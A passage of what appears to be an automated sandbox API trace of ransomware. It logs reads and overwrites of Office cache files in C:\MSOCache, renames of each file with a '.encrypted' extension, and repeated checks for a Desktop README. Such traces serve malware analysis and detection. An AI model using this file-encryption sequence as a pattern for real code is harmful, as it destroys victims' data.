ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0161.058] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0161.058] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", nBufferLength=0x105, lpBuffer=0x2ee214, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpFilePart=0x0) returned 0x50 [0161.058] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee708) returned 1 [0161.058] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4e4 [0161.059] GetFileType (hFile=0x4e4) returned 0x1 [0161.059] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee704) returned 1 [0161.059] GetFileType (hFile=0x4e4) returned 0x1 [0161.059] WriteFile (in: hFile=0x4e4, lpBuffer=0x2337818*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2ee798, lpOverlapped=0x0 | out: lpBuffer=0x2337818*, lpNumberOfBytesWritten=0x2ee798*=0x5b0, lpOverlapped=0x0) returned 1 [0161.060] CloseHandle (hObject=0x4e4) returned 1 [0161.061] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpFilePart=0x0) returned 0x50 [0161.061] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.encrypted", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.encrypted", lpFilePart=0x0) returned 0x5a [0161.061] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7ac) returned 1 [0161.061] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x2ee828 | out: lpFileInformation=0x2ee828*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x45be42a0, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x5b0)) returned 1 [0161.062] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7a8) returned 1 [0161.062] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.encrypted" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml.encrypted")) returned 1 [0161.063] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", nBufferLength=0x105, lpBuffer=0x2ee22c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpFilePart=0x0) returned 0x48 [0161.063] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee720) returned 1 [0161.063] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4e4 [0161.064] GetFileType (hFile=0x4e4) returned 0x1 [0161.064] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee71c) returned 1 [0161.064] GetFileType (hFile=0x4e4) returned 0x1 [0161.064] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x2ee828 | out: lpFileSizeHigh=0x2ee828*=0x0) returned 0x431a290 [0161.217] ReadFile (in: hFile=0x4e4, lpBuffer=0x132f1018, nNumberOfBytesToRead=0x431a290, lpNumberOfBytesRead=0x2ee7d4, lpOverlapped=0x0 | out: lpBuffer=0x132f1018*, lpNumberOfBytesRead=0x2ee7d4*=0x431a290, lpOverlapped=0x0) returned 1 [0165.732] CloseHandle (hObject=0x4e4) returned 1 [0172.419] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0172.419] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0172.419] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee81c | out: lpFileInformation=0x2ee81c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0172.420] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0172.420] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", nBufferLength=0x105, lpBuffer=0x2ee214, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpFilePart=0x0) returned 0x48 [0172.420] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee708) returned 1 [0172.420] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2d8 [0172.425] GetFileType (hFile=0x2d8) returned 0x1 [0172.425] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee704) returned 1 [0172.426] GetFileType (hFile=0x2d8) returned 0x1 [0172.426] WriteFile (in: hFile=0x2d8, lpBuffer=0x9551018*, nNumberOfBytesToWrite=0x431a2a0, lpNumberOfBytesWritten=0x2ee7c4, lpOverlapped=0x0 | out: lpBuffer=0x9551018*, lpNumberOfBytesWritten=0x2ee7c4*=0x431a2a0, lpOverlapped=0x0) returned 1 [0174.728] CloseHandle (hObject=0x2d8) returned 1 [0175.858] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpFilePart=0x0) returned 0x48 [0175.858] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab.encrypted", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab.encrypted", lpFilePart=0x0) returned 0x52 [0175.859] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7ac) returned 1 [0175.859] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab"), fInfoLevelId=0x0, lpFileInformation=0x2ee828 | out: lpFileInformation=0x2ee828*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2d523500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2d523500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x4e8a1760, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x431a2a0)) returned 1 [0175.859] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7a8) returned 1 [0175.859] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab.encrypted" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab.encrypted")) returned 1 [0175.861] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2ee22c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0175.861] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee720) returned 1 [0175.861] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2d8 [0175.861] GetFileType (hFile=0x2d8) returned 0x1 [0175.861] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee71c) returned 1 [0175.861] GetFileType (hFile=0x2d8) returned 0x1 [0175.861] GetFileSize (in: hFile=0x2d8, lpFileSizeHigh=0x2ee828 | out: lpFileSizeHigh=0x2ee828*=0x0) returned 0x75e [0175.862] ReadFile (in: hFile=0x2d8, lpBuffer=0x2249e8c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ee7d4, lpOverlapped=0x0 | out: lpBuffer=0x2249e8c*, lpNumberOfBytesRead=0x2ee7d4*=0x75e, lpOverlapped=0x0) returned 1 [0175.871] CloseHandle (hObject=0x2d8) returned 1 [0176.034] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0176.034] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0176.034] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee81c | out: lpFileInformation=0x2ee81c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0176.039] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0176.039] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2ee214, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0176.040] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee708) returned 1 [0176.040] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2d8 [0176.257] GetFileType (hFile=0x2d8) returned 0x1 [0176.257] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee704) returned 1 [0176.257] GetFileType (hFile=0x2d8) returned 0x1 [0176.257] WriteFile (in: hFile=0x2d8, lpBuffer=0x229a50c*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x2ee798, lpOverlapped=0x0 | out: lpBuffer=0x229a50c*, lpNumberOfBytesWritten=0x2ee798*=0x760, lpOverlapped=0x0) returned 1 [0176.258] CloseHandle (hObject=0x2d8) returned 1 [0176.259] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0176.259] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.encrypted", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.encrypted", lpFilePart=0x0) returned 0x52 [0176.259] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7ac) returned 1 [0176.259] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x2ee828 | out: lpFileInformation=0x2ee828*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x4ec7fb20, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x760)) returned 1 [0176.259] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7a8) returned 1 [0176.259] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.encrypted" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml.encrypted")) returned 1 [0176.260] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee838) returned 1 [0176.260] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0176.260] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2ee314, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0176.260] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2ee560 | out: lpFindFileData=0x2ee560*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc3e6570, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc8a9170, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94eebb0 [0176.263] FindNextFileW (in: hFindFile=0x94eebb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc3e6570, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc8a9170, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0176.263] FindNextFileW (in: hFindFile=0x94eebb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc40b730, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x265c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="PublisherMUI.msi", cAlternateFileName="PUBLIS~1.MSI")) returned 1 [0176.263] FindNextFileW (in: hFindFile=0x94eebb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc3e4630, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="PublisherMUI.xml", cAlternateFileName="PUBLIS~1.XML")) returned 1 [0176.263] FindNextFileW (in: hFindFile=0x94eebb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3cd17e00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3cd17e00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc47e320, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x97f3f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PubLR.cab", cAlternateFileName="")) returned 1 [0176.264] FindNextFileW (in: hFindFile=0x94eebb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x648, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0176.264] FindNextFileW (in: hFindFile=0x94eebb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0176.264] FindClose (in: hFindFile=0x94eebb0 | out: hFindFile=0x94eebb0) returned 1 [0176.264] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7f8) returned 1 [0176.265] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee804) returned 1 [0176.265] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee838) returned 1 [0176.265] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0176.265] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2ee314, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0176.265] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2ee560 | out: lpFindFileData=0x2ee560*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc3e6570, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc8a9170, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94eebb0 [0176.266] FindNextFileW (in: hFindFile=0x94eebb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc3e6570, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc8a9170, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0176.266] FindNextFileW (in: hFindFile=0x94eebb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc40b730, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x265c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="PublisherMUI.msi", cAlternateFileName="PUBLIS~1.MSI")) returned 1 [0176.266] FindNextFileW (in: hFindFile=0x94eebb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc3e4630, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="PublisherMUI.xml", cAlternateFileName="PUBLIS~1.XML")) returned 1 [0176.266] FindNextFileW (in: hFindFile=0x94eebb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3cd17e00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3cd17e00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc47e320, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x97f3f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PubLR.cab", cAlternateFileName="")) returned 1 [0176.266] FindNextFileW (in: hFindFile=0x94eebb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x648, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0176.267] FindNextFileW (in: hFindFile=0x94eebb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x648, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0176.267] FindClose (in: hFindFile=0x94eebb0 | out: hFindFile=0x94eebb0) returned 1 [0176.267] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7f8) returned 1 [0176.267] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee804) returned 1 [0176.267] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", nBufferLength=0x105, lpBuffer=0x2ee22c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpFilePart=0x0) returned 0x4f [0176.267] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee720) returned 1 [0176.268] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2d8 [0176.269] GetFileType (hFile=0x2d8) returned 0x1 [0176.269] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee71c) returned 1 [0176.269] GetFileType (hFile=0x2d8) returned 0x1 [0176.269] GetFileSize (in: hFile=0x2d8, lpFileSizeHigh=0x2ee828 | out: lpFileSizeHigh=0x2ee828*=0x0) returned 0x5aa [0176.269] ReadFile (in: hFile=0x2d8, lpBuffer=0x229e100, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ee7d4, lpOverlapped=0x0 | out: 